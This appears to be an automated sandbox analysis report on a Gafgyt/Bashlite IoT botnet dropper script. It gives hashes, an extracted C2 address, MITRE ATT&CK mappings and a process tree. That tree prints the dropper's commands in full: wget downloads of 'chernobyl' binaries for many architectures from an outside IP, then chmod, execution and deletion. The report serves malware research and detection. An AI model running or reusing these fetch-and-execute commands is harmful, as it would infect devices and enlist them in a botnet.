gafgyt | e48f9260d989390622107e29eaaf97ea897973ab69909d25dbf2626d057eb40f

Analysis

max time kernel
92s
max time network
128s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
01-01-2025 03:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e48f9260d989390622107e29eaaf97ea897973ab69909d25dbf2626d057eb40f.sh
Size

2KB
MD5

87a7140288b8fc77f9917199d1c969bb
SHA1

0931d942a8cc6f317b24082900bd24ec697a697e
SHA256

e48f9260d989390622107e29eaaf97ea897973ab69909d25dbf2626d057eb40f
SHA512

2cdebd869d0cd7f590f050fe987af0ff80592646cdaaff83b7b78f07c8328401c87bd4b8d072dd87ef26de619a2ec7e06ad7e61204371e93e21a1835f23097f7

Score

10^/10

gafgyt botnet defense_evasion discovery

Malware Config

Extracted

Family

gafgyt

195.179.230.64:606

Signatures

Detected Gafgyt variant 1 IoCs

resource	yara_rule
behavioral1/files/fstream-1.dat	family_gafgyt

Gafgyt family
gafgyt
Gafgyt/Bashlite
IoT botnet with numerous variants first seen in 2014.
botnet gafgyt

File and Directory Permissions Modification 1 TTPs 13 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1514	chmod
1525	chmod
1536	chmod
1547	chmod
1552	chmod
1557	chmod
1504	chmod
1509	chmod
1541	chmod
1562	chmod
1567	chmod
1519	chmod
1530	chmod

Executes dropped EXE 1 IoCs

ioc	pid	Process
/tmp/chernobyl.mips	1505	chernobyl.mips

Reads system routing table 1 TTPs 3 IoCs

Gets active network interfaces from /proc virtual filesystem.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/route	chernobyl.x86
File opened for reading	/proc/net/route	chernobyl.i686
File opened for reading	/proc/net/route	chernobyl.i586

Reads system network configuration 1 TTPs 3 IoCs

Uses contents of /proc filesystem to enumerate network settings.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/route	chernobyl.i686
File opened for reading	/proc/net/route	chernobyl.i586
File opened for reading	/proc/net/route	chernobyl.x86

System Network Configuration Discovery 1 TTPs 6 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1499	wget
1505	chernobyl.mips
1507	rm
1508	wget
1510	chernobyl.mipsel
1512	rm

Writes file to tmp directory 13 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/chernobyl.mipsel	wget
File opened for modification	/tmp/chernobyl.sh4	wget
File opened for modification	/tmp/chernobyl.x86	wget
File opened for modification	/tmp/chernobyl.i686	wget
File opened for modification	/tmp/chernobyl.ppc	wget
File opened for modification	/tmp/chernobyl.sparc	wget
File opened for modification	/tmp/chernobyl.arm4	wget
File opened for modification	/tmp/chernobyl.mips	wget
File opened for modification	/tmp/chernobyl.arm5	wget
File opened for modification	/tmp/chernobyl.i586	wget
File opened for modification	/tmp/chernobyl.arm6	wget
File opened for modification	/tmp/chernobyl.arm7	wget
File opened for modification	/tmp/chernobyl.m68k	wget

/tmp/e48f9260d989390622107e29eaaf97ea897973ab69909d25dbf2626d057eb40f.sh
/tmp/e48f9260d989390622107e29eaaf97ea897973ab69909d25dbf2626d057eb40f.sh
1⤵
PID:1498
- /usr/bin/wget
  wget http://195.179.230.64/chernobyl.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1499
- /bin/chmod
  chmod +x chernobyl.mips
  2⤵
  - File and Directory Permissions Modification
  PID:1504
- /tmp/chernobyl.mips
  ./chernobyl.mips
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:1505
- /bin/rm
  rm -rf chernobyl.mips
  2⤵
  - System Network Configuration Discovery
  PID:1507
- /usr/bin/wget
  wget http://195.179.230.64/chernobyl.mipsel
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1508
- /bin/chmod
  chmod +x chernobyl.mipsel
  2⤵
  - File and Directory Permissions Modification
  PID:1509
- /tmp/chernobyl.mipsel
  ./chernobyl.mipsel
  2⤵
  - System Network Configuration Discovery
  PID:1510
- /bin/rm
  rm -rf chernobyl.mipsel
  2⤵
  - System Network Configuration Discovery
  PID:1512
- /usr/bin/wget
  wget http://195.179.230.64/chernobyl.sh4
  2⤵
  - Writes file to tmp directory
  PID:1513
- /bin/chmod
  chmod +x chernobyl.sh4
  2⤵
  - File and Directory Permissions Modification
  PID:1514
- /tmp/chernobyl.sh4
  ./chernobyl.sh4
  2⤵
  PID:1515
- /bin/rm
  rm -rf chernobyl.sh4
  2⤵
  PID:1517
- /usr/bin/wget
  wget http://195.179.230.64/chernobyl.x86
  2⤵
  - Writes file to tmp directory
  PID:1518
- /bin/chmod
  chmod +x chernobyl.x86
  2⤵
  - File and Directory Permissions Modification
  PID:1519
- /tmp/chernobyl.x86
  ./chernobyl.x86
  2⤵
  - Reads system routing table
  - Reads system network configuration
  PID:1520
- /bin/rm
  rm -rf chernobyl.x86
  2⤵
  PID:1523
- /usr/bin/wget
  wget http://195.179.230.64/chernobyl.m68k
  2⤵
  - Writes file to tmp directory
  PID:1524
- /bin/chmod
  chmod +x chernobyl.m68k
  2⤵
  - File and Directory Permissions Modification
  PID:1525
- /tmp/chernobyl.m68k
  ./chernobyl.m68k
  2⤵
  PID:1526
- /bin/rm
  rm -rf chernobyl.m68k
  2⤵
  PID:1528
- /usr/bin/wget
  wget http://195.179.230.64/chernobyl.i686
  2⤵
  - Writes file to tmp directory
  PID:1529
- /bin/chmod
  chmod +x chernobyl.i686
  2⤵
  - File and Directory Permissions Modification
  PID:1530
- /tmp/chernobyl.i686
  ./chernobyl.i686
  2⤵
  - Reads system routing table
  - Reads system network configuration
  PID:1531
- /bin/rm
  rm -rf chernobyl.i686
  2⤵
  PID:1534
- /usr/bin/wget
  wget http://195.179.230.64/chernobyl.ppc
  2⤵
  - Writes file to tmp directory
  PID:1535
- /bin/chmod
  chmod +x chernobyl.ppc
  2⤵
  - File and Directory Permissions Modification
  PID:1536
- /tmp/chernobyl.ppc
  ./chernobyl.ppc
  2⤵
  PID:1537
- /bin/rm
  rm -rf chernobyl.ppc
  2⤵
  PID:1539
- /usr/bin/wget
  wget http://195.179.230.64/chernobyl.i586
  2⤵
  - Writes file to tmp directory
  PID:1540
- /bin/chmod
  chmod +x chernobyl.i586
  2⤵
  - File and Directory Permissions Modification
  PID:1541
- /tmp/chernobyl.i586
  ./chernobyl.i586
  2⤵
  - Reads system routing table
  - Reads system network configuration
  PID:1542
- /bin/rm
  rm -rf chernobyl.i586
  2⤵
  PID:1545
- /usr/bin/wget
  wget http://195.179.230.64/chernobyl.sparc
  2⤵
  - Writes file to tmp directory
  PID:1546
- /bin/chmod
  chmod +x chernobyl.sparc
  2⤵
  - File and Directory Permissions Modification
  PID:1547
- /tmp/chernobyl.sparc
  ./chernobyl.sparc
  2⤵
  PID:1548
- /bin/rm
  rm -rf chernobyl.sparc
  2⤵
  PID:1550
- /usr/bin/wget
  wget http://195.179.230.64/chernobyl.arm4
  2⤵
  - Writes file to tmp directory
  PID:1551
- /bin/chmod
  chmod +x chernobyl.arm4
  2⤵
  - File and Directory Permissions Modification
  PID:1552
- /tmp/chernobyl.arm4
  ./chernobyl.arm4
  2⤵
  PID:1553
- /bin/rm
  rm -rf chernobyl.arm4
  2⤵
  PID:1555
- /usr/bin/wget
  wget http://195.179.230.64/chernobyl.arm5
  2⤵
  - Writes file to tmp directory
  PID:1556
- /bin/chmod
  chmod +x chernobyl.arm5
  2⤵
  - File and Directory Permissions Modification
  PID:1557
- /tmp/chernobyl.arm5
  ./chernobyl.arm5
  2⤵
  PID:1558
- /bin/rm
  rm -rf chernobyl.arm5
  2⤵
  PID:1560
- /usr/bin/wget
  wget http://195.179.230.64/chernobyl.arm6
  2⤵
  - Writes file to tmp directory
  PID:1561
- /bin/chmod
  chmod +x chernobyl.arm6
  2⤵
  - File and Directory Permissions Modification
  PID:1562
- /tmp/chernobyl.arm6
  ./chernobyl.arm6
  2⤵
  PID:1563
- /bin/rm
  rm -rf chernobyl.arm6
  2⤵
  PID:1565
- /usr/bin/wget
  wget http://195.179.230.64/chernobyl.arm7
  2⤵
  - Writes file to tmp directory
  PID:1566
- /bin/chmod
  chmod +x chernobyl.arm7
  2⤵
  - File and Directory Permissions Modification
  PID:1567
- /tmp/chernobyl.arm7
  ./chernobyl.arm7
  2⤵
  PID:1568
- /bin/rm
  rm -rf chernobyl.arm7
  2⤵
  PID:1570

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/chernobyl.mips

Filesize
149KB

MD5
76cd360f074eaa5d8287bb0762aab991

SHA1
72da777df5b6d7794efa05d87e5528d0c45e1403

SHA256
e6177852038d2130936a6c52ae274f813d5338f94b4f27faa6e19f7db19cbd46

SHA512
897e406c0982fa347e945653a5af9db7876004ff0e54a9a2bb5cde10bb0df3b52172a54481726d974621291deaae0c29df90e2333eb81c6fe30f15e190cdfd38

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads